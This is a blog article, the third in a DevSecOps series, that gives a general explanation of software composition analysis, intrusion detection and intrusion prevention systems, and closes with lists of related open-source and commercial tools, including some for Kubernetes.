[Part 3] DevSecOps SCA/IDS/IPS
Welcome to the 3th DevSecOps article (previous articles:
Part 0: https://medium.com/@lahutsin/part-0-devsecops-introduction-412e3aa019a6
Part 1: https://medium.com/@lahutsin/part-1-devsecops-analytics-41c560004da3)
Part 2: https://medium.com/@lahutsin/part-2-devsecops-nast-96f7c9e25645 (0–7 — spoiler). Today we will talk to you about analyzing and detecting intrusions and countering them. As a rule, any application consists of public components that need to be controlled. I hope you will be satisfied with getting some knowledge in this specialization, and continue to develop this area in the future. This series of articles assumes a basic understanding and knowledge of DevOps. As an author, I do not claim to have a final or conclusive expert opinion in this area.
SCA
Software Composition Analysis (SCA) is the process of analyzing and assessing the security of third-party components that are used in your software.
SCA is used as part of DevSecOps practices to ensure the security of applications and reduce the risks associated with using open-source third-party components.
It involves analyzing all dependencies and third-party libraries that are used in your application and determining whether those components have been associated with any security vulnerabilities or known exploits.
SCA allows developers to quickly and effectively identify and remediate vulnerabilities in third-party components, which improves the security of applications and reduces the likelihood of critical errors occurring during development.
As we know, there are built-in package auditing mechanisms in every build approach, which is definitely a good thing. However, there are some nuances. As a rule, this audit is rarely carried out, as it is informational in nature. Our task is to make it strictly mandatory in the case when a particular package or component has some malicious code, but it has not yet been discovered by the community.
As was clear from previous articles, there are paid and free solutions. And here it all depends on the desire to implement this toolkit. This analysis process is usually implemented at the stage of artifact assembly, which means that if we have potentially dangerous third-party software, it simply will not pass further. Therefore, a deeper pipeline scheme will look as follows.
What is the point of doing this at all? The point is that standard auditing software performs the role of searching for vulnerabilities that have been found in a specific version of the package and suggests updating them to more up-to-date versions. Third-party SCA utilities, on the other hand, can find malware or embedded malicious code in the code based on some signs.
IDS
IDS (Intrusion Detection System) is a system that is used to monitor network activity and detect possible attacks on computer systems and applications.
IDS is part of the DevSecOps approach to security, which involves embedding security throughout the development process, not just in the final product. IDS is used to detect malicious activity and other types of attacks that could threaten the security of the system.
IDS works by monitoring network traffic and analyzing it for anomalies that could indicate an attack or other unwanted activity. When the system detects an anomaly, it sends an alert or signal for further analysis and response.
IDS can be implemented using both hardware and software. It can operate independently or as part of a comprehensive security system. IDS helps to prevent attacks and improve the overall security of the system.
It is worth noting that the utilities mentioned above are mainly used in traditional networks, but in theory, they can also work in microservices.
Based on the above context, it becomes clear that the cluster approach is now more popular, and therefore the detection system should control the internal network and any other nested network, at least because the cloud provider usually does not provide extensive control of its networks for reasons of its own security.
IPS
In the context of DevSecOps, IPS (Intrusion Prevention System) refers to a security mechanism or tool that is integrated into development and operations processes to detect and prevent intrusions or attacks on a system or application under development or deployment. IPS plays an important role in ensuring the security and integrity of software throughout its lifecycle.
In DevSecOps, IPS is typically used to provide preventive security measures in the continuous integration, continuous delivery, and continuous deployment (CI/CD) process. It helps to identify and block potential security vulnerabilities or malicious activity in real-time, ensuring that only safe and secure code is deployed to production environments.
Here are some key aspects of IPS in the context of DevSecOps:
- Real-time preventive protection: IPS actively monitors network traffic, system logs, or application activity to detect suspicious or malicious behavior. It uses a variety of techniques, such as signature-based detection, behavioral analysis, anomaly detection, and heuristics to identify potential threats.
- Automated response: IPS can automatically respond to detected threats or attacks by taking pre-defined actions, such as blocking certain IP addresses, terminating network connections, or applying access control policies. Automation helps to reduce response time and minimize the impact of security incidents.
- Integration into CI/CD pipeline: IPS can be seamlessly integrated into the CI/CD pipeline, allowing security checks and protection mechanisms to be applied at different stages of the software development and deployment process. This ensures that security is an integral part of the entire development lifecycle.
- Rule tuning and optimization: IPS solutions provide flexibility for tuning and optimizing security rules to meet the specific needs of the application or system. This allows organizations to configure IPS to meet their unique security requirements and minimize false positives or misses.
- Continuous monitoring and feedback loop: IPS continuously monitors the system or application for new threats and provides feedback to developers. This feedback loop promotes continuous improvement of security practices and helps to proactively address vulnerabilities or weaknesses.
Integrating IPS into the DevSecOps workflow allows organizations to improve the security of their applications and systems, reduce the risk of data breaches or cyberattacks, and ensure that security is embedded at all stages of software development and deployment.
As always, the work of all types of utilities is presented below in a general context (taking into account previous articles). It is worth paying attention to all the arrangements — this was done intentionally. In some cases this may be moved.
Given the fact that we currently live in a world of containers, it becomes clear what significant disadvantages and risks we have if we use services with limited orchestration (It is also important to be able to implement IDS/IPS systems in a cluster or on a native-node-pets if you like the classic style).
Extra:
SCA tools:
- OWASP Dependency-Check
- WhiteSource Bolt
- Snyk
- Sonatype Nexus Lifecycle
- FOSSA
- Dependabot
- GitLab Dependency Scanning
- Black Duck Hub Detect
- AuditJS
- Nexus Firewall
- and more…
IDS tools:
- Snort
- Suricata
- Bro
- OSSEC
- Security Onion
- Snorby
- SELKS
- OpenWIPS-ng
- Zeek
- Suricata-update
- and more…
IDS tools (for Kubernates):
- Falco
- Sysdig Secure
- Aqua Security
- Sysdig Falco Operator
- kube-hunter
- Ksniff
- kube-batch
- kube-psp-advisor
- KubeArmor
- and more…
Write your opinions in the comments.
What do you think about this?
Best Regards,
Alex Lahutsin
